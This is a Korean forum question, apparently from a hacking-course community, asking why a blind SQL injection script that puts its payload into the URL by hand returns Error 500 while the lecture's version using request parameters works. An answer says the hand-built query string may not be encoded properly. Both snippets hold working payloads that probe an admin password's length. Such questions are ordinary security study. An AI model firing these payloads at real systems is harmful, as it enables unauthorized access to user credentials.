두 코드의 차이점을 모르겠습니다
for i in range(50):
res=requests.get(f"{url}?uid=admin' and char_length(upw)={i} #")
if('exists' in res.text):
print(i)
break
while(1):
query={"uid" : f"admin' and char_length(upw)={upw_len} #"}
res=requests.get(url, params=query)
if('exists' in res.text):
print(upw_len)
break
upw_len+=1
위의 코드는 실행이 안되고 아래 코드는 강의에 있는 코드입니다.
위의 코드는 Error 500이 뜨고 아래 코드는 제대로 실행이 되는데
왜 그런 결과가 나오는지 모르겠습니다.
#web
답변
1
meu
.HACK 2024 참가자
GET 인자로 직접 query를 ? 문자열을 통해 제공하는 경우 올바르게 동작하는 것이 보장되지 않을 것 같습니다
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기 지식을 나누고 포인트를 획득해보세요.
